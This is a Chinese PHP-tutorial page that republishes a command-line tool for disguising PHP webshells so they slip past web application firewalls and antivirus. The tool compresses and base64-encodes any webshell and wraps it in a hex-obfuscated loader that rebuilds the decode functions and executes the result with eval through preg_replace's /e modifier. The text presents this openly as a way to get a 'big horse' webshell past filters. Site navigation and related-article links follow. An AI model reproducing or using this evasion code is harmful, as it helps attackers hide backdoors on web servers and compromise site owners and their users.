编程 PHP

php shell超强免杀、减少体积工具实现代码

Posted in PHP onOctober 16, 2012

lostwolf写的
这不是webshell,只是个webshell免杀工具
切勿当初webshell使用
仅限免杀phpwebshell
该工具运行在 cli 模式！
如果有无法突破的文件内容过滤可尝试下用这个工具免杀大马！
任意php webshell 通过此工具编码之后可以饶过国内一些bt的防火墙

<?php 
/* 
Title: PHP shell nokill T00L 
Blog: exploit-db.blogcn.com 
*/ 
error_reporting(0); 
@ini_set('memory_limit','-1'); 
set_time_limit(0); 
$toolname="$argv[0]"; 
if ($argc<2) { 
baner($toolname); 
die; 
} 
$input_file= trim($argv[1]); 
$output_file='nokill_'.$input_file; 
if (file_exists($input_file)) { 
No_kill_c0de($input_file,$output_file); 
echo "PHP shell nokill T00L\r\n"; 
echo "Blog: exploit-db.blogcn.com\r\n"; 
echo "Input: {$input_file}\r\n"; 
$file_full_path=dirname(__FILE__).DIRECTORY_SEPARATOR.$output_file; 
echo "[+] Generate success!\r\n"; 
echo "Saved to {$file_full_path}"."\r\n"; 
} else { 
echo "PHP shell nokill T00L\r\n"; 
echo "Blog: exploit-db.blogcn.com\r\n"; 
die("[-] Failed ! The File $input_file does not exist"); 
} 
function No_kill_c0de($input_file,$output_file){ 
$no_whitespace=php_strip_whitespace($input_file); 
$no_php_tag=trim(trim(trim($no_whitespace,'<?php'),'<?'),'?>'); 
$enfile=base64_encode(gzdeflate($no_php_tag)); 
$shellcode="\x3c\x3f\x70\x68\x70\xd\xa"; 
$shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."\xd\xa"; 
$shellcode.="\x24\x62\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x66\x27\x2c\x22\x22\x2c\x22\x62\x66\x61\x66\x73\x66\x65\x66\x36\x66\x34\x66\x5f\x66\x66\x64\x66\x66\x65\x66\x66\x63\x66\x66\x6f\x66\x66\x64\x66\x66\x65\x66\x22\x29\x3b\xd\xa\x24\x67\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x58\x27\x2c\x27\x27\x2c\x27\x67\x58\x58\x7a\x58\x58\x69\x58\x58\x6e\x58\x58\x58\x58\x66\x58\x58\x58\x6c\x58\x58\x61\x58\x58\x58\x74\x58\x58\x58\x58\x58\x65\x27\x29\x3b\xd\xa\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x5c\x27\x61\x5c\x27\x65\x69\x73\x27\x2c\x27\x65\x27\x2e\x27\x76\x27\x2e\x27\x61\x27\x2e\x27\x6c\x27\x2e\x27\x28\x24\x67\x28\x24\x62\x28\x24\x65\x6e\x66\x69\x6c\x65\x29\x29\x29\x27\x2c\x27\x61\x27\x29\x3b\xd\xa"; 
$shellcode.="\x3f\x3e"; 
file_put_contents("$output_file",$shellcode); 
} 
function baner($toolname){ 
echo "PHP shell nokill T00L\r\n"; 
echo "Blog: exploit-db.blogcn.com\r\n"; 
echo "Usage: {$toolname} phpwebshell\r\n"; 
} 
?>

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

建立动态的WML站点(一)

Oct 09 PHP

PHP程序员编程注意事项

Apr 10 PHP

php 获取完整url地址

Dec 20 PHP

php iconv() : Detected an illegal character in input string

Dec 05 PHP

jQuery 源码分析笔记

May 25 PHP

一个基于phpQuery的php通用采集类分享

Apr 09 PHP

thinkphp实现like模糊查询实例

Oct 29 PHP

php使用GD库创建图片缩略图的方法

Jun 10 PHP

php实现表单多按钮提交action的处理方法

Oct 24 PHP

PHP判断JSON对象是否存在的方法(推荐)

Jul 06 PHP

php获取今日开始时间和结束时间的方法

Feb 27 PHP

PHP使用反向Ajax技术实现在线客服系统详解

Jul 01 PHP

PHP中替换换行符的几种方法小结

Oct 15 #PHP

php变量范围介绍

Oct 15 #PHP

php模板函数正则实现代码

Oct 15 #PHP

php mssql扩展SQL查询中文字段名解决方法

Oct 15 #PHP

PHP获取文件后缀名的三个函数

Oct 15 #PHP

php标签云的实现代码

Oct 10 #PHP

域名和cookie问题(域名后缀)

Oct 10 #PHP

You might like

基于mysql的论坛（1）

2006/10/09 PHP

PHP 组件化编程技巧

2009/06/06 PHP

Array of country list in PHP with Zend Framework

2011/10/17 PHP

解析mysql 表中的碎片产生原因以及清理

2013/06/22 PHP

PHP合并静态文件详解

2014/11/14 PHP

php随机显示指定文件夹下图片的方法

2015/07/13 PHP

Zend Framework实现将session存储在memcache中的方法

2016/03/22 PHP

thinkphp制作404跳转页的简单实现方法

2016/09/22 PHP

使用laravel根据用户类型来显示或隐藏字段

2019/10/17 PHP

jquery实现的超出屏幕时把固定层变为定位层的代码

2010/02/23 Javascript

一个简单的网站访问JS计数器刷新1次加1次访问

2012/09/20 Javascript

js判断背景图片是否加载成功使用img的width实现

2013/05/29 Javascript

js实现人才网站职位选择功能的方法

2015/08/14 Javascript

js中javascript:void(0) 真正含义

2020/11/05 Javascript

bootstrap vue.js实现tab效果

2017/02/07 Javascript

从零开始学习Node.js系列教程二：文本提交与显示方法

2017/04/13 Javascript

深入理解Angular4中的依赖注入

2017/06/07 Javascript

vue中如何实现变量和字符串拼接

2017/06/19 Javascript

JS实现的计数排序与基数排序算法示例

2017/12/04 Javascript

利用npm 安装删除模块的方法

2018/05/15 Javascript

新手如何快速理解js异步编程

2019/06/24 Javascript

Vue打包部署到Nginx时,css样式不生效的解决方式

2020/08/03 Javascript

[01:27]2014DOTA2展望TI 剑指西雅图IG战队专访

2014/06/30 DOTA

Python字符串拼接、截取及替换方法总结分析

2016/04/13 Python

flask session组件的使用示例

2018/12/25 Python

Pycharm+Python+PyQt5使用详解

2019/09/25 Python

Python装饰器实现方法及应用场景详解

2020/03/26 Python

python输出国际象棋棋盘的实例分享

2020/11/26 Python

CSS3教程(2):网页边框半径和网页圆角

2009/04/02 HTML / CSS

锐步英国官网：Reebok英国

2019/11/29 全球购物

武汉世纪畅想数字传播有限公司.NET笔试题

2014/07/22 面试题

汽车专业大学生职业生涯规划范文

2014/01/07 职场文书

中学生社区服务活动报告

2015/02/05 职场文书

mysql连接查询中and与where的区别浅析

2021/07/01 MySQL

Beekeeper Studio开源数据库管理工具比Navicat更炫酷

2022/06/21 数据库

HTML5中的DOCUMENT.VISIBILITYSTATE属性详解

2023/05/07 HTML / CSS